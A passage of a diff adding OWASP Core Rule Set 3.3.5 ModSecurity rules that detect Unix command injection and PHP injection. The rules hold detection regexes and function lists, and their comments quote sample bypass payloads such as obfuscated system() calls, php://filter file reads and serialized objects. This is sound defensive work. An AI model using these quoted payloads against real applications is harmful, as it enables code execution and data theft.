+ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:(?:(?:a[\\\\'\"]*p[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*u[\\\\'\"]*d|u[\\\\'\"]*p[\\\\'\"]*2[\\\\'\"]*d[\\\\'\"]*a[\\\\'\"]*t)[\\\\'\"]*e|d[\\\\'\"]*n[\\\\'\"]*f|v[\\\\'\"]*i)[\\\\'\"]*(?:\s|<|>).*|p[\\\\'\"]*(?:a[\\\\'\"]*c[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*(?:\s|<|>).*|w[\\\\'\"]*d|s)|w[\\\\'\"]*(?:(?:\s|<|>).*|h[\\\\'\"]*o))\b" \ + "id:932106,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/3',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# +# -=[ Bypass Rule 930120 (wildcard) ]=- +# +# When Paranoia Level is set to 1 and 2, a Remote Command Execution +# could be exploited bypassing rule 930120 (OS File Access Attempt) +# by using wildcard characters. +# +# In some other cases, it could be bypassed even if the Paranoia Level is set to 3. +# Please, keep in mind that this rule could lead to many false positives. 
+#
+SecRule ARGS "@rx (?:/|\\\\)(?:[\?\*]+[a-z/\\\\]+|[a-z/\\\\]+[\?\*]+)" \
+ "id:932190,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecode,t:urlDecodeUni,t:normalizePath,t:cmdLine,\
+ msg:'Remote Command Execution: Wildcard bypass technique attempt',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ tag:'paranoia-level/3',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+#
+# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
+#
+
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-932-APPLICATION-ATTACK-RCE"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
new file mode 100644
index 000000000..58be88f2f
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
@@ -0,0 +1,734 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ PHP Injection Attacks ]=- +# +# [ References ] +# http://rips-scanner.sourceforge.net/ +# https://www.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Executionh +# + +# +# [ PHP Open Tag Found ] +# +# Detects PHP open tags "', but +# this resulted in false positives which were difficult to prevent. +# Therefore, that pattern is now checked by rule 933190 in paranoia levels +# 3 or higher. 
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:<\?(?:[^x]|x[^m]|xm[^l]|xml[^\s]|xml$|$)|<\?php|\[(?:\/|\\\\)?php\])" \
+ "id:933100,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecodeUni,t:lowercase,\
+ msg:'PHP Injection Attack: PHP Open Tag Found',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-php',\
+ tag:'platform-multi',\
+ tag:'attack-injection-php',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/242',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# [ PHP Script Uploads ]
+#
+# Block file uploads with filenames ending in PHP related extensions
+# (.php, .phps, .phtml, .php5 etc).
+#
+# Many application contain Unrestricted File Upload vulnerabilities.
+# https://www.owasp.org/index.php/Unrestricted_File_Upload
+#
+# Attackers may use such a vulnerability to achieve remote code execution
+# by uploading a .php file. If the upload storage location is predictable
+# and not adequately protected, the attacker may then request the uploaded
+# .php file and have the code within it executed on the server.
+#
+# Also block files with just dot (.) characters after the extension:
+# https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla
+#
+# Some AJAX uploaders use the nonstandard request headers X-Filename,
+# X_Filename, or X-File-Name to transmit the file name to the server;
+# scan these request headers as well as multipart/form-data file names.
+# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\.*$" \ + "id:933110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: PHP Script File Upload Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Configuration Directives ] +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-config-directives.data" \ + "id:933120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:normalisePath,t:lowercase,\ + msg:'PHP Injection Attack: Configuration Directive Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule MATCHED_VARS "@pm =" \ + "capture,\ + ctl:auditLogParts=+E,\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Variables ] +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-variables.data" \ + "id:933130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:normalisePath,t:urlDecodeUni,t:lowercase,\ + msg:'PHP Injection Attack: Variables Found',\ + logdata:'Matched Data: %{TX.0} found within 
%{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP I/O Streams ] +# +# The "php://" syntax can be used to refer to various objects, such as local files (for LFI), +# remote urls (for RFI), or standard input/request body. Its occurrence indicates a possible attempt +# to either inject PHP code or exploit a file inclusion vulnerability in a PHP web app. +# +# Examples: +# php://filter/resource=./../../../wp-config.php +# php://filter/resource=http://www.example.com +# php://stdin +# php://input +# +# http://php.net/manual/en/wrappers.php.php +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)php://(?:std(?:in|out|err)|(?:in|out)put|fd|memory|temp|filter)" \ + "id:933140,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: I/O Stream Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Wrappers ] +# +# PHP comes with many built-in wrappers for various URL-style protocols for use with the filesystem +# functions such as fopen(), copy(), file_exists() and filesize(). 
Abusing of PHP wrappers like phar:// +# could lead to RCE as describled by Sam Thomas at BlackHat USA 2018 (https://bit.ly/2yaKV5X), even +# wrappers like zlib://, glob://, rar://, zip://, etc... could lead to LFI and expect:// to RCE. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:zlib|glob|phar|ssh2|rar|ogg|expect|zip)://" \ + "id:933200,\ + phase:2,\ + block,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\ + msg:'PHP Injection Attack: Wrapper scheme detected',\ + logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Functions ] +# +# Detecting PHP function names is useful to block PHP code injection attacks. +# There are many PHP functions. We have to strike a balance between robust detection +# of PHP code in content, and the risk of false positives. +# +# The list of PHP functions is divided into four groups of varying attack/false positive risk. +# Four separate rules are used to detect these groups of functions: +# +# - Rule 933150: ~40 words highly common to PHP injection payloads and extremely rare in +# natural language or other contexts. +# Examples: 'base64_decode', 'file_get_contents'. +# These words are detected as a match directly using @pmFromFile. +# Function names are defined in php-function-names-933150.data +# +# - Rule 933160: ~220 words which are common in PHP code, but have a higher chance to cause +# false positives in natural language or other contexts. +# Examples: 'chr', 'eval'. 
+# To mitigate false positives, a regexp looks for PHP function syntax, e.g. 'eval()'.
+# Regexp is generated from function names in util/regexp-assemble/regexp-933160.data
+#
+# - Rule 933151: ~1300 words of lesser importance. This includes most PHP functions and keywords.
+# Examples: 'addslashes', 'array_diff'.
+# For performance reasons, the @pmFromFile operator is used, and many functions from lesser
+# used PHP extensions are removed.
+# To mitigate false positives, we only match when the '(' character is also found.
+# This rule only runs in paranoia level 2 or higher.
+# Function names are defined in php-function-names-933151.data
+#
+# - Rule 933161: ~200 words with short or trivial names, possibly leading to false positives.
+# Examples: 'abs', 'cos'.
+# To mitigate false positives, a regexp matches on function syntax, e.g. 'abs()'.
+# This rule only runs in paranoia level 3 or higher.
+# Regexp is generated from function names in util/regexp-assemble/regexp-933161.data
+#
+
+
+#
+# [ PHP Functions: High-Risk PHP Function Names ]
+#
+# Rule 933150 contains a small list of function names which are highly indicative of a PHP
+# injection attack, for example 'base64_decode'.
+# We block these function names outright, without using a complex regexp or chain.
+# This could make the detection a bit more robust against possible bypasses.
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933150.data" \
+ "id:933150,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:lowercase,\
+ msg:'PHP Injection Attack: High-Risk PHP Function Name Found',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-php',\
+ tag:'platform-multi',\
+ tag:'attack-injection-php',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/242',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# [ PHP Functions: High-Risk PHP Function Calls ]
+#
+# Some PHP function names have a certain risk of false positives, due to short
+# names, full or partial overlap with common natural language terms, uses in
+# other contexts, et cetera. Some examples are 'eval', 'exec', 'system'.
+#
+# For these function names, we apply a regexp to look for PHP function syntax.
+# The regexp looks for a word boundary and adjoining parentheses.
+# For instance, we want to block 'eval()', but we want to allow 'medieval()'.
+#
+# We have to be careful of possible bypasses using comment syntax. Examples:
+#
+# system(...)
+# system (...)
+# system\t(...)
+# system /*comment*/ (...)
+# system /*multiline \n comment*/ (...)
+# system //comment \n (...)
+# system #comment \n (...)
+# +# This rule is also triggered by the following exploit(s): +# [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ] +# [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45260 ] +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +# Regexp generated from util/regexp-assemble/regexp-933160.data using Regexp::Assemble. +# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. +# +# Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble +# output. Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create|socket_client)|ipc?slashes|rev)|implexml_load_(?:string|file)|ocket_c(?:onnect|reate)|h(?:ow_sourc|a1_fil)e|pl_autoload_register|ystem)|p(?:r(?:eg_(?:replace(?:_callback(?:_array)?)?|match(?:_all)?|split)|oc_(?:(?:terminat|clos|nic)e|get_status|open)|int_r)|o(?:six_(?:get(?:(?:e[gu]|g)id|login|pwnam)|mk(?:fifo|nod)|ttyname|kill)|pen)|hp(?:_(?:strip_whitespac|unam)e|version|info)|g_(?:(?:execut|prepar)e|connect|query)|a(?:rse_(?:ini_file|str)|ssthru)|utenv)|r(?:unkit_(?:function_(?:re(?:defin|nam)e|copy|add)|method_(?:re(?:defin|nam)e|copy|add)|constant_(?:redefine|add))|e(?:(?:gister_(?:shutdown|tick)|name)_function|ad(?:(?:gz)?file|_exif_data|dir))|awurl(?:de|en)code)|i(?:mage(?:createfrom(?:(?:jpe|pn)g|x[bp]m|wbmp|gif)|(?:jpe|pn)g|g(?:d2?|if)|2?wbmp|xbm)|s_(?:(?:(?:execut|write?|read)ab|fi)le|dir)|ni_(?:get(?:_all)?|set)|terator_apply|ptcembed)|g(?:et(?:_(?:c(?:urrent_
use|fg_va)r|meta_tags)|my(?:[gpu]id|inode)|(?:lastmo|cw)d|imagesize|env)|z(?:(?:(?:defla|wri)t|encod|fil)e|compress|open|read)|lob)|a(?:rray_(?:u(?:intersect(?:_u?assoc)?|diff(?:_u?assoc)?)|intersect_u(?:assoc|key)|diff_u(?:assoc|key)|filter|reduce|map)|ssert(?:_options)?)|h(?:tml(?:specialchars(?:_decode)?|_entity_decode|entities)|(?:ash(?:_(?:update|hmac))?|ighlight)_file|e(?:ader_register_callback|x2bin))|f(?:i(?:le(?:(?:[acm]tim|inod)e|(?:_exist|perm)s|group)?|nfo_open)|tp_(?:nb_(?:ge|pu)|connec|ge|pu)t|(?:unction_exis|pu)ts|write|open)|o(?:b_(?:get_(?:c(?:ontents|lean)|flush)|end_(?:clean|flush)|clean|flush|start)|dbc_(?:result(?:_all)?|exec(?:ute)?|connect)|pendir)|m(?:b_(?:ereg(?:_(?:replace(?:_callback)?|match)|i(?:_replace)?)?|parse_str)|(?:ove_uploaded|d5)_file|ethod_exists|ysql_query|kdir)|e(?:x(?:if_(?:t(?:humbnail|agname)|imagetype|read_data)|ec)|scapeshell(?:arg|cmd)|rror_reporting|val)|c(?:url_(?:file_create|exec|init)|onvert_uuencode|reate_function|hr)|u(?:n(?:serialize|pack)|rl(?:de|en)code|[ak]?sort)|(?:json_(?:de|en)cod|debug_backtrac|tmpfil)e|b(?:(?:son_(?:de|en)|ase64_en)code|zopen)|var_dump)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \ + "id:933160,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: High-Risk PHP Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Object Injection ] +# +# PHP Object Injection is an application level vulnerability that could allow +# an attacker to perform different kinds of malicious attacks, such as +# Code Injection, SQL Injection, Path 
Traversal and Application Denial of Service, +# depending on the context. +# +# The vulnerability occurs when user-supplied input is not properly sanitized +# before being passed to the unserialize() PHP function. Since PHP allows object +# serialization, attackers could pass ad-hoc serialized strings to a vulnerable +# unserialize() call, resulting in an arbitrary PHP object(s) injection into the +# application scope. +# +# https://www.owasp.org/index.php/PHP_Object_Injection +# +# In serialized form, PHP objects have the following format: +# +# O:8:"stdClass":1:{s:1:"a";i:2;} +# O:3:"Foo":0:{} +# +# Also detected are PHP objects with a custom unserializer: +# http://www.phpinternalsbook.com/classes_objects/serialization.html +# These have the following format: +# +# C:11:"ArrayObject":37:{x:i:0;a:1:{s:1:"a";s:1:"b";};m:a:0:{}} +# C:3:"Foo":23:{s:15:"My private data";} +# +# HTTP headers are inspected, since PHP object injection vulnerabilities have been +# found in applications parsing them: +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562 (User-Agent header) +# https://www.exploit-db.com/exploits/39033/ (X-Forwarded-For header) +# http://karmainsecurity.com/KIS-2015-10 (Host header) +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XML:/* "@rx [oOcC]:\d+:\".+?\":\d+:{.*}" \ + "id:933170,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Serialized Object Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + +# +# [ PHP Functions: Variable 
Function Calls ] +# +# PHP 'variable functions' provide an alternate syntax for calling PHP functions. +# http://php.net/manual/en/functions.variable-functions.php +# +# An attacker may use variable function syntax to evade detection of function +# names during exploitation of a remote code execution vulnerability. +# An example to use the 'file_get_contents' function while evading rule 933150: +# +# $fn = 'file_' . 'get_' . 'contents'; +# echo $fn('wp-co' . 'nfig.php'); +# +# Some examples from obfuscated malware: +# +# $OOO0000O0(...) +# @$b374k(...) +# $_[@-_]($_[@!+_] ) +# +# A breakdown of the regular expression: +# +# \$+ +# The variable's '$' char, or multiple '$' for 'variable variables': +# http://php.net/manual/en/language.variables.variable.php +# (?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+}) +# One of the following: +# - A variable name; regexp from http://php.net/language.variables.basics +# - A nonempty expression for variable variables: ${'fn'} or $ {'fn'} +# (?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)* +# Optional whitespace, array access, or comments +# \(.*\) +# Parentheses optionally containing function parameters +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx \$+(?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+})(?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)*\(.*\)" \ + "id:933180,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Variable Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ PHP Functions: Variable 
Function Prevent Bypass ] +# +# Referring to https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/ +# the rule 933180 could be bypassed by using the following payloads: +# +# - (system)('uname') +# - (sy.(st).em)('uname') +# - (string)"system"('uname') +# - define('x', 'sys' . 'tem');(x)/* comment */('uname') +# - $y = 'sys'.'tem';($y)('uname') +# - define('z', [['sys' .'tem']]);(z)[0][0]('uname'); +# - (system)(ls) +# - (/**/system)(ls/**/); +# - (['system'])[0]('uname'); +# - (++[++system++][++0++])++{/*dsasd*/0}++(++ls++); +# +# This rule blocks all payloads above and avoids to block values like: +# +# - [ACME] this is a test (just a test) +# - Test (with two) rounded (brackets) +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:\(|\[)[a-zA-Z0-9_.$\"'\[\](){}/*\s]+(?:\)|\])[0-9_.$\"'\[\](){}/*\s]*\([a-zA-Z0-9_.$\"'\[\](){}/*\s].*\)|\([\s]*string[\s]*\)[\s]*(?:\"|'))" \ + "id:933210,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecode,t:replaceComments,t:compressWhitespace,\ + msg:'PHP Injection Attack: Variable Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + +# +# [ PHP 
Functions: Medium-Risk PHP Function Names ] +# +# In paranoia level 2, we add additional checks for most PHP functions. +# +# The size of the PHP function list is considerable. +# Even after excluding the more obscure PHP extensions, 1300+ functions remain. +# For performance and maintenance reasons, this rule does not use a regexp, +# but uses a phrase file (@pmFromFile), and additionally looks for an '(' character +# in the matched variable. +# +# This approach carries some risk for false positives. Therefore, the function list +# has been curated to remove words closely matching natural language and terms often +# used in other contexts. +# +# This rule is a stricter sibling of rule 933150. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933151.data" \ + "id:933151,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule MATCHED_VARS "@pm (" \ + "capture,\ + ctl:auditLogParts=+E,\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + +# +# [ PHP Variables: Common Variable Indexes ] +# +# In paranoia level 3, we add additional 
checks for parameters to many PHP variables. +# +# +# One of the more common variables used within attacks on PHP is $_SERVER. Because +# of how many different ways PHP has for executing variables (variable variables, +# etc) often just looking for $_SERVER will be less effective than looking for the +# various indexes within $_SERVER. This rule checks for these indexes. +# This rule is located in PL 3 because often developers will use these names as +# parameter names or values and this will lead to false positives. +# Because this list is not expected to change and it is limited in size we use a +# regex in this case to look for these values whereas in its sibling rule we use +# @pmFromFile for flexibility and performance. +# +# To rebuild the regexp: +# cd util/regexp-assemble +# ./regexp-assemble.pl < regexp-933131.data +# +# This rule is a stricter sibling of rule 